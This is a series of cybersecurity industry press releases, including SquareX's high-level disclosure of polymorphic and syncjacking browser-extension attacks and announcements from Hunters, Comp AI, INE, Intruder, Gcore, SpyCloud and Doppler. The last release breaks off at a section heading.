Category: Company News & Announcements

Palo Alto, Singapore, March 6th, 2025, CyberNewsWire

With recent attack disclosures like Browser Syncjacking and extension infostealers, browser extensions have become a primary security concern at many organizations. SquareX’s research team discovers a new class of malicious extensions that can impersonate any extension installed on the victim’s browser, including password managers and crypto wallets. These malicious extensions can morph themselves to have the exact same user interface, icons and text as the legitimate extension, making it an extremely convincing case for victims to enter their credentials and other sensitive information. This attack impacts most major browsers, including Chrome and Edge.

Polymorphic extensions work by exploiting the fact that most users interact with extensions via the pinned in the browser toolbar. The attack begins with the user installing the malicious extension, which disguises itself, for example, as an unassuming AI tool. To make the attack even more convincing, the extension performs the AI functionality as advertised and remains benign for a predetermined period of time. 

However, while all this is happening, the malicious extension starts figuring out what other extensions are installed in the victim’s browser. Once identified, the polymorphic extension completely changes its own appearance to look like the target, including the icon shown on the pinned toolbar. It can even disable the target extension temporarily, removing it from the pinned bar. Given that most users use these icons as a visual confirmation to inform which extension they are interacting with, changing the icon itself is likely sufficient to convince the average user that they are clicking on the legitimate extension. Even if the victim navigates to the extension dashboard, there is no obvious way to correlate the tools displayed there to the pinned icons. To avoid suspicion, the malicious extension can even temporarily disable the target extension such that they are the only ones with the target’s icon on the pinned tab. 

Critically, the polymorphic extension can impersonate any browser extension. For example, it can mimic popular password managers to trick victims into entering their master password. This password can then be used by the attacker to log on to the real password manager and access all credentials stored in the password vault. Similarly, the polymorphic extension can also mimic popular crypto wallets, allowing them to use the stolen credentials to authorize transactions to send cryptocurrency to the attacker. Other potential targets include developer tools and banking extensions that may provide the attacker unauthorized access to apps where sensitive data or financial assets are stored.

Furthermore, the attack only requires medium-risk permissions based on Chrome Store’s classification. Ironically, many of these permissions are used by password managers themselves, as well as other popular tools like ad blockers and page stylers, making it especially difficult for Chrome Store and security teams to identify malicious intent just by looking at the extension’s code.

The founder of SquareX, Vivek Ramachandran cautions that “Browser extensions present a major risk to enterprises and users today. Unfortunately, most organizations have no way of auditing their current extension footprint and to check whether they are malicious. This further underscores the need for a browser native security solution like Browser Detection and Response, similar to what an EDR is to the operating system.”

These polymorphic extensions exploit existing features within Chrome to conduct the attack. As such, there is no software bug involved, and it cannot be patched. SquareX has written to Chrome for responsible disclosure, recommending banning or implementation of user alerts for any extension icon changes or abrupt changes in HTML, as these techniques can easily be leveraged by attackers to impersonate other extensions in a polymorphic attack. For enterprises, static extension analysis and permissions-based policies are no longer sufficient – it is critical to have a browser-native security tool that can dynamically analyze extension behaviour at runtime, including polymorphic tendencies of malicious extensions. 

For more information about polymorphic extensions, additional findings from this research are available at https://sqrx.com/polymorphic-extensions.

About SquareX

SquareX helps organizations detect, mitigate, and threat-hunt client-side web attacks happening against their users in real time, including defending against malicious extensions. In addition to the polymorphic attack, SquareX was also the first to discover and disclose multiple extension-based attacks, including Browser Syncjacking, the Chrome Store consent phishing attack leading to Cyberhaven’s breach and numerous other MV3-compliant malicious extensions revealed at DEF CON 32.

SquareX’s industry-first Browser Detection and Response (BDR) solution, takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

Additionally, with SquareX, enterprises can provide contractors and remote workers with secure access to internal applications, enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions. 

Contact

Head of PR
Junice Liew
SquareX
junice@sqrx.com

The post SquareX Unveils Polymorphic Extensions that Morph Infostealers into Any Browser Extension – Password Managers, Wallets at Risk appeared first on Cybersecurity Insiders.

Boston and Tel Aviv, United States, March 4th, 2025, CyberNewsWire

Pathfinder AI expands Hunters’ vision for AI-driven SOCs, introducing Agentic AI for autonomous investigation and response.

Hunters, the leader in next-generation SIEM, today announced Pathfinder AI, a major step toward a more AI-driven SOC. Building on Copilot AI, which is already transforming SOC workflows with LLM-powered investigation guidance, Hunters is introducing its Agentic AI vision, designed to autonomously enhance detection, investigation, and response. Agentic AI will launch soon, with ongoing innovations to further streamline security operations.

“Hunters has already made a significant impact on our security operations by reducing manual investigations, streamlining data ingestion, and improving threat visibility. With Pathfinder AI, we’re enhancing efficiency and response times through AI-driven detection explanations and automated investigative guidance. This innovation continues to strengthen Emburse’s security posture with cutting-edge AI-powered threat intelligence.” — Casey Sword, Endpoint Security Architect, Emburse

How AI is Shaping the Future of Security Operations

Security investigations are complex and unpredictable—each alert triggers multiple investigative steps, creating an overwhelming number of possible paths. Traditional automation follows rigid workflows, often leaving analysts stuck chasing false leads while real threats slip through.

AI changes the equation. Unlike static rule-based automation, Agentic AI dynamically adapts, prioritizing critical threats, filtering out noise, and continuously refining investigations to keep security teams focused and efficient.

To stay ahead of evolving threats, SOCs need two key AI-driven capabilities:

  • Copilot AI – Enhances analyst workflows with automated data analysis, report generation, and guided investigations.
  • Agentic AI – Delivers autonomous threat detection, investigation, and response, reducing manual workloads and accelerating decision-making.

By leveraging specialized AI agents that collaborate in real time, security teams can move beyond manual triage and fragmented investigations—operating faster, smarter, and with greater precision.

Hunters Pathfinder AI

From day one, Hunters was founded with the vision of embedding analyst intelligence into the SIEM—automating triage and investigation to maximize efficiency and accuracy. With years of experience refining AI-driven security operations, they are uniquely positioned to lead the AI-driven SOC transformation, leveraging the deep expertise to deliver automation at scale.

As Hunters Pathfinder AI continues to evolve, they are expanding its capabilities in two key areas: AI-Assisted SOC and AI-Driven SOC. These advancements will further reduce manual workloads while enhancing detection, investigation, and response.

AI-Assisted SOC with Copilot AI

  • Lead Summarization – AI-generated summaries that provide analysts with immediate and comprehensive context on security events.
  • Guided Investigation Workflows – Suggests next steps across the entire attack surface.
  • Natural Language Querying – Enables SOC analysts to interact with the system using conversational AI to retrieve insights efficiently.
  • Custom Detection Authoring – Helps analysts refine detections with guided logic and iterative fine-tuning.
  • Threat Classification – AI evaluates signals and context to determine whether a threat is benign or malicious, reducing manual triage time.

AI-Driven SOC with Agentic AI

  • Autonomous Triage and Classification – AI-driven agents investigate every threat, classifying incidents and providing full investigation reports.
  • Self-Optimizing Detections – Machine learning models continuously refine detection accuracy based on real-world attack data.
  • Automated Root Cause Analysis – AI correlates attack signals across multiple sources to provide full attack narratives.

“Pathfinder AI is a game-changer for SOC teams, allowing us to deliver on our promise of making security operations more effective in the fight against cyber threats. By combining Copilot AI and Agentic AI, we are not just automating tasks but enabling security teams to focus on what truly matters—stopping real threats before they cause harm.” — Ian Forrest, VP of Product, Hunters

The Road Ahead

Hunters remains committed to pushing the boundaries of SOC automation with AI-driven investigations, automated response mechanisms, and deeper AI capabilities. Pathfinder AI represents the next advancement toward a faster, smarter, and more effective security operations center and will be delivered in the upcoming months.

For more details, users can explore Hunters’ blog post and join the webinar about this announcement on March 5th, 2025.

About Hunters

Hunters empowers SOC teams with AI-driven automation, maximizing efficiency without large security budgets. As a next-gen SIEM, the Hunters SOC Platform integrates Agentic AI, Copilot AI, machine learning, and graph-based correlation to automate detection, investigation, and response. Trusted by Cimpress, OpenLane, and The RealReal, Hunters delivers built-in detections, AI-driven investigations, and security expert support from Team Axon.

For more information, users can visit Hunters Security.

Contact

Ada Filipek
Hunters
ada.filipek@hunters.ai

The post Hunters Announces New AI Capabilities with Pathfinder AI for Smarter SOC Automation appeared first on Cybersecurity Insiders.

San Francisco, California, March 3rd, 2025, CyberNewsWire

With the growing importance of security compliance for startups, more companies are seeking to achieve and maintain compliance with frameworks like SOC 2, ISO 27001 & GDPR. Bubba AI, Inc. is building a comprehensive solution for these organizations to easily integrate compliance workflows and build their own customized processes through an open-source alternative to existing GRC (Governance, Risk, and Compliance) automation platforms.

The company is positioning itself to address the compliance needs of organizations ranging from early-stage startups to established enterprises. Bubba AI’s flagship product, Comp AI, offers a built-in risk register, and policies required for frameworks while also allowing companies to build their compliance workflows using building blocks provided by the platform.

Introducing Comp AI

Comp AI is an open-source alternative to GRC automation platforms like Vanta and Drata. The platform includes several key features designed to automate compliance with frameworks such as SOC 2:

  • A built-in risk register to help companies identify, document, and assess potential security risks
  • Out-of-the-box security policies for modern companies, complete with an AI-powered editor for customization
  • A comprehensive vendor management suite for tracking, assessing, and identifying third-party vendors
  • Automated evidence-collection tools that reduce the manual burden of compliance documentation

The open source nature of Comp AI differentiates it from existing solutions in the market, allowing for greater community involvement, customization, and cost savings for companies on their compliance journey.

The Value of Open Source Compliance Solutions

Bubba AI was founded in late 2024 by Lewis Carhart. Carhart recognized a significant gap in the market for affordable, flexible compliance automation tools that could serve the needs of a wide range of companies.

“While building at previous companies, I experienced firsthand how painful and resource-intensive the compliance process can be, especially for smaller organizations. The existing solutions were either prohibitively expensive or lacked the flexibility we needed. I wanted to create an open source platform that democratizes access to compliance automation”, Lewis Carhart commented.

This experience led Carhart to develop Comp AI as an open source alternative that could help organizations of all sizes achieve SOC 2 compliance without breaking the bank or getting locked into proprietary systems.

The Ambitious Goal

Bubba AI has set an ambitious target: helping 100,000 companies achieve compliance with cyber security frameworks like SOC 2, ISO 27001 & GDPR by 2032. This goal reflects the growing importance of security certifications as businesses increasingly handle sensitive customer data and face stricter regulatory requirements.

“We believe that strong security practices shouldn’t be a luxury that only well-funded companies can afford. By providing an open source solution, we’re removing barriers to entry and empowering organizations to build robust security programs regardless of their size or resources”, said Lewis Carhart.

The company plans to build a community around its open-source platform, encouraging contributions and extensions that can benefit the broader business ecosystem.

About Bubba AI

Bubba AI, Inc. was founded at the end of 2024. Its mission is clear: help 100,000 companies get compliant with common cyber security frameworks by 2032. To do this, Bubba AI, Inc. is launching its first product – Comp AI, an open-source alternative to Vanta & Drata.

Contact

Founder
Lewis Carhart
Bubba AI, Inc.
hello@trycomp.ai

The post Bubba AI, Inc. is launching Comp AI to help 100,000 startups get SOC 2 compliant by 2032. appeared first on Cybersecurity Insiders.

Cary, NC, February 25th, 2025, CyberNewsWire

 INE, the leading provider of networking and cybersecurity training and certifications, today announced its recognition as an enterprise and small business leader in online course providers and cybersecurity professional development, along with its designation as the recipient of G2’s 2025 Best Software Awards for Education Products. This category of awards ranks the world’s top 50 software education products based on authentic reviews from more than 100 million G2 users. 

“We are thrilled to be recognized for a second consecutive year by G2’s Best Software Awards,” said Dara Warn, CEO of INE. “This is not only a testament to INE’s robust educational offerings but also underscores our dedication to empowering enterprise teams and professionals with the skills they need to thrive in a challenging digital landscape. We are proud to set the standard for quality and effectiveness in cybersecurity and technical education, as evidenced by the success of our students.”

G2’s Best Software Awards rank the world’s best software companies and products based on verified user reviews and publicly available market presence data. Fewer than 1% of vendors listed on G2 are named to the list. 

“The 2025 Best Software Award winners represent the very best in the industry, standing out for their exceptional performance and customer satisfaction. The stakes for choosing the right business software are higher than ever,” said Godard Abel, co-founder & CEO at G2. “With over 180,000 software products and services listings and 2.8 million verified user reviews in the G2 marketplace, we’re proud to help companies navigate these critical choices with insights rooted in authentic customer feedback. Congratulations to this year’s honorees!”

G2 badges, released quarterly, recognize INE’s strong performance compared to competitors in specific areas, including its enterprise cybersecurity training and certification offerings, the depth and breadth of its online learning library, and global impact. INE earned the following G2 badges for Winter 2025:

  • Fastest Implementation, Online Course Providers
  • Leader, Cybersecurity Professional Development
  • Leader, Online Course Providers
  • Leader, Technical Skills Development
  • Enterprise Leader, Online Course Providers
  • Small Business Leader, Online Course Providers
  • Leader, Asia Online Course Providers
  • Leader, Asia Pacific Online Course Providers
  • Momentum Leader, Technical Skills Development
  • Momentum Leader, Online Course Providers
  • Small Business High Performer, Technical Skills Development
  • High Performer, India Online Course Providers
  • High Performer, Europe Online Course Providers
  • High Performer, Asia Technical Skills Development

INE was recently named to Security Boulevard’s list of the Top 10 Hacking Certifications for both the Certified Professional Penetration Tester (eCPPT) and Web Application Penetration Tester eXtreme (eWPTX) certifications. The list showcases some of the best ethical hacking certifications for cybersecurity professionals. 

In reviewing the eCPPT, reviewers noted: 

  • The realistic experience
  • A robust training program
  • Its credentials to boost employability in Europe (specifically noted as “remarkable”). 

In reviewing the eWPTX, reviewers applaud: 

  • The challenging nature of the exam
  • Requiring advanced methodologies and skills in creating exploits that “modern tools couldn’t fathom.” 

With a suite of the best cybersecurity certifications and training programs designed for teams and individuals, INE continues to lead in developing cybersecurity professionals equipped with real-time, hands-on experience to manage cyber threats and security incidents. Our award-winning cybersecurity software and comprehensive training in network security, cloud security, and risk management, prepare learners to become certified ethical hackers (CEH), certified information systems security professionals (CISSP), and more, solidifying our reputation as the trusted partner in cybersecurity excellence and threat intelligence.

About INE: 

INE is the premier provider of online technical training for the IT industry. Harnessing the world’s most powerful hands-on lab platform, cutting-edge technology, global video distribution network, and world-class instructors, INE is the top training choice for Fortune 500 companies worldwide, and for IT professionals looking to advance their careers. INE’s suite of learning paths offers an incomparable depth of expertise across cybersecurity, cloud, networking, and data science. INE is committed to delivering the most advanced technical training on the planet, while also lowering the barriers worldwide for those looking to enter and excel in an IT career. 

Contact

Kathryn Brown
INE Security
kbrown@ine.com

The post INE Secures Spot in G2’s 2025 Top 50 Education Software Rankings appeared first on Cybersecurity Insiders.

Cary, North Carolina, February 19th, 2025, CyberNewsWire

2025 marks a time of unprecedented volatility in the technology job market. On one hand, dependence on technology is soaring. The growth of AI and machine learning is propelling a surge in new technologies, tactics, and ideas.

At the same time, organizations are trying to adapt to the changing dynamic. This has led to more job uncertainty, which the technology sector usually avoids. This year alone, roughly 7,000 jobs have been cut across dozens of tech giants, fueling growing concerns among industry professionals. 

As the technology job market weathers this volatility, INE Security, a global leader in networking and cybersecurity training, is highlighting its commitment to equipping IT professionals with the skills they need to thrive. INE focuses on practical training, certifications, and preparation. This helps networking and cybersecurity professionals succeed in a changing job market.

“Continuous learning and adaptation are more important than ever for individuals hoping to succeed in their networking and cybersecurity career,” said Dara Warn, CEO of INE Security. “It is vital that professionals maintain a continuous cycle of learning. Training gives learners the knowledge and skills they need to succeed. Hands-on practice helps them understand tasks better. Certifications show that they have learned well and prove their skill mastery.”

Key Benefits of INE’s Training and Certification Programs:

  • Enhanced Employability: Executives, supervisors, and HR professionals are completely aligned in considering industry or professional certifications the most compelling during the hiring process, according to the Society for Human Resource Management (SHRM). 
  • Practical Experience: The human element was involved in 68% of cybersecurity breaches in 2023 (Verizon’s 2024 Data Breach Investigations Report). Practical, hands-on experience and industry-recognized certifications validate the skills needed to minimize this risk. 
  • Flexible Learning Paths: From foundational courses to advanced certifications, learners can tailor their education to career goals and market needs.

“With every technological advancement, the skill sets required to manage, secure, and innovate within these systems evolve,” added Warn. “INE Security’s commitment to updating our course materials and labs ensures that our students are always at the forefront of the industry. Our focus is on making them indispensable in their current roles and highly attractive to prospective employers. INE’s training programs are more than just skill-building—they are career lifelines for professionals affected by market disruptions. ”

For more information about how INE can help you stabilize your cybersecurity and networking career goals, users can visit www.ine.com.

For a limited time, access INE Security training and certifications for up to 50% off, including eJPT, eMAPT, eCTHP, eCIR, eCDFP, and ICCA. Bundle certifications with Premium training and save even more. 

About INE Security

INE Security is the premier provider of online networking and cybersecurity training and certification.

Harnessing a powerful hands-on lab platform, cutting-edge technology, a global video distribution network, and world-class instructors, INE Security is the top training choice for Fortune 500 companies worldwide for red-team and blue-team security training in business and for IT professionals looking to advance their careers. INE Security’s suite of learning paths offers an incomparable depth of expertise across cybersecurity and is committed to delivering advanced technical training while also lowering the barriers worldwide for those looking to enter and excel in an IT career.

Contact

Kathryn Brown
INE Security
kbrown@ine.com

The post INE Security’s Cybersecurity and IT Training Enhances Career Stability in Tech appeared first on Cybersecurity Insiders.

Intel by Intruder now uses AI to contextualize NVD descriptions, helping security teams assess risk faster.

Intruder, a leader in attack surface management, has launched AI-generated descriptions for Common Vulnerabilities and Exposures (CVEs) within its free vulnerability intelligence platform, Intel. This new feature enhances cybersecurity professionals’ ability to quickly understand and assess vulnerabilities, addressing a common pain point: the often vague and technical descriptions provided by the National Vulnerability Database (NVD).

With thousands of vulnerabilities published every year, security teams rely on NVD as a key resource for researching CVEs. However, NVD descriptions frequently lack clarity or context, making it difficult to determine potential impact at a glance. Intel’s AI summaries transform NVD descriptions into clear, concise, and actionable insights, helping teams assess and respond to risks faster.

“Vulnerability management is challenging enough without the added complexity of deciphering cryptic CVE descriptions,” said Chris Wallis, CEO & Founder of Intruder. “With Intel’s AI Overviews, we’re making it easier for security professionals to quickly gauge what a vulnerability is and decide what action to take.”

Additionally, Intruder’s in-house security experts manually review the AI descriptions of the most critical vulnerabilities. These expert-reviewed CVEs are clearly marked in Intel with a “Verified by Intruder” label.

Intel, which is completely free to use, already provides powerful features such as a real-time feed of trending CVEs, a unique hype score rated out of 100, and in-depth analysis from Intruder’s security team. The addition of AI-generated CVE descriptions further strengthens Intel’s value as a go-to resource for cybersecurity professionals.

Availability

The AI-generated CVE descriptions are available now within Intel at intel.intruder.io. Cybersecurity professionals can access Intel for free today.

For more information, users visit www.intruder.io or follow Intruder on LinkedIn and Twitter.

About Intruder

Intruder was founded in 2015 to solve the information overload crisis in vulnerability management. Its mission from day one has been to help divide the needles from the haystack, focusing on what matters, while ignoring the rest. Effective cyber security is about getting the basics right. Intruder helps do that, saving time on the easy stuff, so users can focus on the rest. It has been awarded multiple accolades, was selected for GCHQ’s Cyber Accelerator, and is now proud to have over 3,000 happy customers all over the world.

The post Intruder Enhances Free Vulnerability Intelligence Platform ‘Intel’ with AI-Generated CVE Descriptions appeared first on Cybersecurity Insiders.

Luxembourg, Luxembourg, February 11th, 2025, CyberNewsWire

Gcore, the global edge AI, cloud, network, and security solutions provider, today announced the findings of its Q3-Q4 2024 Radar report into DDoS attack trends. DDoS attacks have reached unprecedented scale and disruption in 2024, and businesses need to act fast to protect themselves from this evolving threat. The report reveals a significant escalation in the total number of DDoS attacks and their magnitude, measured in terabits per second (Tbps).

Key highlights from Q3-Q4 2024

●    Compared to Q3–Q4 2023, the number of DDoS attacks have risen by 56%, which highlights a steep long-term growth trend.

●    The gaming industry continues to be the most targeted by DDoS attacks, accounting for 34% of all attacks.

●    In Q3-Q4 2024, the financial services sector experienced a significant increase, accounting for 26% of all DDoS attacks, up from 12% in the previous period.

●    There was a 17% increase in the total number of attacks compared with Q1-Q2 2024.

●    The largest attack peaked at 2Tbps in Q3-Q4 2024, which is an 18% increase from Q1-Q2 2024.

●    DDoS attacks are becoming shorter in duration but more powerful.

Attackers are shifting their focus

The sectors that were targeted in Q3-Q4 2024 reflect a changing focus among DDoS attackers. The technology industry has seen a steady increase in its share of DDoS attacks, increasing from 7% to 19% since Q3-Q4 2023. This is because DDoS attackers recognise the wide-reaching disruption potential of attacking technology services. A single successful attack can take out a service that countless organizations depend on – causing significant harm to people and businesses. Another reason that technology platforms have seen an increase in DDoS attacks is due to their vast computational power, which malicious actors can exploit to intensify their attacks.

The gaming industry continues to be the most-attacked industry, although there were 31% fewer attacks compared with Q1-Q2 2024. The decline in attacks may be attributed to several factors. For instance, gaming companies are strengthening their DDoS defenses in response to ongoing attacks, which may result in fewer successful attacks. Another explanation is that attackers may be shifting their focus towards other high-value sectors, such as financial services, which saw a 117% increase in the number of attacks. The sector’s critical online services and susceptibility to ransom-based attacks make it a prime target.

Andrey Slastenov, Head of Security at Gcore, commented: “The latest Gcore Radar should be a wake-up call to businesses across all industries. Not only is the number and intensity of attacks increasing, but attackers are expanding the scope of their attacks to reach an increasingly wide range of sectors. Businesses must invest in robust DDoS detection, mitigation, and protection to prevent the financial and reputational impact of an attack.

The geographical distribution of DDoS attacks

With a presence that spans six continents, Gcore can accurately track the geographical sources of DDoS attacks. Gcore derives these insights from the attackers’ IP addresses and the geographic locations of the data centers where malicious traffic is targeted. 

Gcore’s findings have highlighted the Netherlands as a key source of attacks; leading application-layer attacks with 21% and ranking second for network-layer attacks at 18%. The U.S. ranked highly across both layers, reflecting its vast internet infrastructure for hackers to exploit.

Brazil featured prominently in network-layer attacks at 14%. Brazil’s growing digital economy and connectivity make it an emerging source of attacks. China and Indonesia also featured prominently, with Indonesia showing a growth in application-layer attacks at 8%, which reflects a broader trend of increased attack activity in Southeast Asia.

Short but potent attacks continue to take hold

DDoS attacks are becoming shorter in duration, but no less disruptive. The longest DDoS attack duration during Q3-Q4 2024 was five hours, which is a significant decrease from 16 hours in the first half of the year. This is reflective of an increasing trend towards shorter but more intense attacks. These ‘burst attacks’ can be more difficult to detect as they may blend in with normal traffic spikes. The delay in detection gives attackers a window of opportunity to disrupt services before cyber defenses can kick in.

The trend of shorter DDoS attack durations can in part be attributed to improvements in cybersecurity. As security tightens, attackers have learned to adapt with short burst attacks designed to bypass defenses. A short DDoS attack can also double as a smokescreen to conceal a secondary attack, such as ransomware deployment.

The full report is available at https://gcore.com/library/gcore-radar-ddos-attack-trends-q3-q4-2024

About Gcore  

Gcore is a global edge AI, cloud, network, and security solutions provider. Headquartered in Luxembourg, with a team of 600 operating from ten offices worldwide, Gcore provides solutions to global leaders in numerous industries. Gcore manages its global IT infrastructure across six continents, with one of the best network performances in Europe, Africa, and LATAM due to the average response time of 30 ms worldwide. Gcore’s network consists of 180 points of presence worldwide in reliable Tier IV and Tier III data centers, with a total network capacity exceeding 200 Tbps.

Users can learn more at gcore.com or follow them on LinkedIn, Twitter, and Facebook.

Contact

Gcore press contact
pr@gcore.com

The post Gcore Radar report reveals 56% year-on-year increase in DDoS attacks appeared first on Cybersecurity Insiders.

Austin, TX, USA, February 4th, 2025, CyberNewsWire

SpyCloud’s Identity Threat Protection solutions spearhead a holistic identity approach to security, illuminating correlated hidden identity exposures and facilitating fast, automated remediation.

SpyCloud, a leading identity threat protection company, announced key innovations in its portfolio, pioneering the shift to holistic identity threat protection. By operationalizing its vast collection of darknet data with automated identity analytics that correlate malware, phishing, and breach exposures across individuals’ past and present work and personal personas, SpyCloud enables security and fraud prevention teams to comprehensively uncover hidden identity assets, rapidly remediate exposures, and better protect their businesses from previously unseen threats.  

Identity security vendors have focused narrowly on securing corporate accounts, leaving organizations vulnerable to cybercriminals exploiting the broader identity exposures of employees, consumers, and suppliers. A shift to an identity-centric perspective is needed, particularly as the scope of identity exposures continues to grow. SpyCloud research reveals that the average individual has as many as 52 unique usernames/emails and 221 passwords exposed on the darknet across their online personal and professional identities. 

The impact of these exposures is evident: nearly a quarter of data breaches resulted from compromised identity data. Credential attacks led to $4.81 million in related costs per breach and took the longest to identify and contain. 

SpyCloud’s holistic identity threat protection addresses these challenges by encompassing the full spectrum of an individual’s online presence. This innovative approach empowers security teams to proactively protect against previously unseen risks, including the darknet exposures of identity and authentication data stolen about employees, consumers, and suppliers that have been beyond their visibility to date. 

“The cybersecurity industry has spent years and billions of dollars securing accounts, but criminals have moved far beyond account-level access,” said Ted Ross, SpyCloud’s CEO and Co-Founder. “The dirty secret of the identity security industry is that efforts to lock down the perimeter fail because they focus on accounts, while bad actors target the full scope of users’ holistic identities. These sprawling identities, exposed through breaches, infostealer infections, and phishing attacks, create shadow data that traditional tools simply can’t address. ”

Ross continued, “SpyCloud changes the dynamic by providing unmatched visibility into the same data criminals are exploiting, enabling organizations to remediate exposures across the entirety of users’ online personas. This shifts the advantage back to security leaders, empowering them to act on threats that were previously beyond their reach.”

Key Innovations Underpinning SpyCloud’s Holistic Identity Threat Protection 

  • Refined analytics driving actionability on exposed identities: SpyCloud applies advanced data science and proprietary technology to dynamically correlate billions of recaptured darknet data points, providing a broader and more accurate view of identities. By connecting authentication data, financial data, and personally identifiable information (PII), SpyCloud uncovers hidden relationships across seemingly unrelated accounts, continuously and at scale.
  • Automated remediation in <15 minutes: SpyCloud’s holistic identity portfolio now enables rapid, automated remediation within enterprise security ecosystems, including EDR, IdP, SOAR, and SIEM tools. This allows security teams to neutralize threats in less than 15 minutes of discovery, reducing risk without straining resources or operational bandwidth.
  • Malware reverse engineering to combat ransomware: SpyCloud specializes in the tracking and analyzing of malware – with deep insights into pervasive infostealers such as Lumma C2, Redline Stealer, Vidar, and more – as they are often a precursor to ransomware. Through its advanced malware reverse analysis, SpyCloud provides comprehensive visibility into malware-exposed data, helping organizations identify compromised devices, users, and applications and closes critical security gaps, including those stemming from unmanaged or under-managed devices used by employees, contractors, and vendors.
  • Accelerated cybercrime investigations: SpyCloud’s Investigations solution, used by cyber threat intelligence (CTI) teams, security operations, fraud and risk prevention analysts, and law enforcement globally, includes automated identity analytics to uncover the full scope of digital identity exposures, accelerating complex cybercrime investigations into threat actor attribution, insider risk (including potential hiring fraud), and supply chain risk analysis from days or hours to minutes.

SpyCloud’s Capabilities Set a New Standard for Identity Security

SpyCloud champions the transition to holistic identity security, backed by nearly a decade of experience and the industry’s largest repository of recaptured breach, malware-exfiltrated, and successfully phished data. Its holistic identity lens reveals a comprehensive view of exposed identity information – from credentials and PII to financial data and sensitive digital artifacts.

“SpyCloud’s innovative identity threat protection is about as important as it gets in cyber; identity is everything,” said John N. Stewart, SpyCloud Board Member and former Chief Security and Trust Officer of Cisco. “By making it possible to view and act on the world’s best source for identity exposures, SpyCloud raised the bar to the top for proactive defense against all types of identity-driven cyber exploitation.”

“We are redefining identity security by making holistic protection practical and achievable for our customers,” added Damon Fleury, SpyCloud’s Chief Product Officer. “SpyCloud has a long history of leading the way in understanding the cybercrime ecosystem, from our early days in world-class ATO prevention to continuing to build solutions that empower organizations to proactively protect against threats stemming from infostealer malware, phished and breach data.” 

Fleury continued, “This evolution to make holistic identity threat protection a reality for enterprises is critical to our mission of disrupting cybercrime. We aim to stop identity-based threats once and for all.”

To learn more, users can contact SpyCloud or view the following resources:

About SpyCloud

SpyCloud transforms recaptured darknet data to disrupt cybercrime. Its automated holistic identity threat protection solutions leverage advanced analytics to proactively prevent ransomware and account takeover, safeguard employee and consumer accounts, and accelerate cybercrime investigations. SpyCloud’s data from breaches, malware-infected devices, and successful phishes also powers many popular dark web monitoring and identity theft protection offerings. Customers include seven of the Fortune 10, along with hundreds of global enterprises, mid-sized companies, and government agencies worldwide. Headquartered in Austin, TX, SpyCloud is home to more than 200 cybersecurity experts whose mission is to protect businesses and consumers from the stolen identity data criminals are using to target them now.

To learn more and see insights, users can visit spycloud.com.

Contact

Public Relations
Emily Brown
REQ on behalf of SpyCloud
ebrown@req.co

The post SpyCloud Pioneers the Shift to Holistic Identity Threat Protection appeared first on Cybersecurity Insiders.

San Francisco, United States / California, January 30th, 2025, CyberNewsWire

Doppler, the leading provider of secrets management solutions, announced a new integration with Datadog, a cloud application monitoring and security platform. This collaboration provides engineering and operations teams with an integrated solution for securely managing sensitive credentials and gaining insights into cloud environments through real-time monitoring.

In an era of rapid cloud adoption, DevOps and security teams face mounting challenges in safeguarding sensitive data across distributed systems. By combining Doppler’s automated secrets management capabilities with Datadog’s comprehensive monitoring platform, this integration enables teams to enhance their security practices while maintaining operational visibility. Doppler’s automated secrets storage and rotation, paired with Datadog’s continuous monitoring, empowers teams to mitigate risks of secret sprawl and prevent unauthorized access in a scalable, automated fashion.

Streamlining security and visibility across cloud environments

Many DevOps teams need help maintaining consistent security practices as secrets are often scattered across environments, increasing the risk of misconfigurations. The Doppler integration with Datadog addresses this issue head-on by creating a centralized workflow for managing secrets and monitoring activity across all environments. With Datadog’s alerts and Doppler’s automated security measures, teams can detect and respond to suspicious activity, helping to ensure security and compliance.

“We are thrilled to integrate with Datadog to combine our secrets management capabilities with their monitoring platform,” said Brian Vallelunga, CEO and Founder of Doppler. “This integration simplifies security for developers and gives organizations the ability to manage secrets at scale, gaining visibility and control over sensitive information across the entire cloud environment. Together, we’re helping teams protect their data while allowing them to stay focused on building great software.”

How the Doppler-Datadog Integration Solves Key Security Challenges

  • Automated secrets management: Doppler’s platform automates the rotation, storage, and encryption of secrets, minimizing the risk of human error and unauthorized access.
  • Real-time monitoring and alerts: Datadog’s continuous monitoring enables teams to track secret usage, receive alerts for suspicious access, and respond quickly to any anomalies.
  • Security across hybrid environments: This integration unifies secrets management and monitoring, providing consistency in security practices across hybrid and multi-cloud setups.

Centralized deployment for DevOps and Security teams

The integration allows teams to centralize secrets management in Doppler while benefiting from Datadog’s secret usage observability. This provides a simplified solution for both managing and monitoring sensitive information. This approach enhances security without disrupting workflows, helping organizations to meet compliance requirements, reduce risk, and modernize their operations.

Availability

The integration is available now. For more information on how this integration can improve users’ security posture and improve secrets management, users can visit the Datadog Integration Documentation.

About Doppler

Doppler is a leader in secrets management, providing a centralized, secure solution that automates handling sensitive information such as API keys, tokens, and credentials. Thousands of development teams worldwide trust Doppler to simplify secrets management, improve operational efficiency, and prevent data breaches.

Contact

Doppler Press
press@doppler.com

The post Doppler announces integration with Datadog to streamline security and monitoring appeared first on Cybersecurity Insiders.

Palo Alto, USA, January 30th, 2025, CyberNewsWire

SquareX discloses a new attack technique that shows how malicious extensions can be used to completely hijack the browser, and eventually, the whole device.

PALO ALTO, Calif., Jan. 30, 2025 — Browser extensions have been under the spotlight in enterprise security news recently due to the wave of OAuth attacks on Chrome extension developers and data exfiltration attacks. However, until now, due to the limitations browser vendors place on the extension subsystem and extensions, it was thought to be impossible for extensions to gain full control of the browser, much less the device.

SquareX researchers Dakshitaa Babu, Arpit Gupta, Sunkugari Tejeswara Reddy and Pankaj Sharma debunked this belief by demonstrating how attackers can use malicious extensions to escalate privileges to conduct a full browser and device takeover, all with minimal user interaction. Critically, the malicious extension only requires read/write capabilities present in the majority of browser extensions on the Chrome Store, including common productivity tools like Grammarly, Calendly and Loom, desensitizing users from granting these permissions. This revelation suggests that virtually any browser extension could potentially serve as an attack vector if created or taken over by an attacker. To the best of our understanding, extensions submitted to the Chrome Store requesting these capabilities are not put through additional security scrutiny at the time of this writing.

The browser syncjacking attack can be broken up into three parts: how the extension silently adds a profile managed by the attacker, hijacks the browser and eventually gains full control of the device.

Profile Hijacking

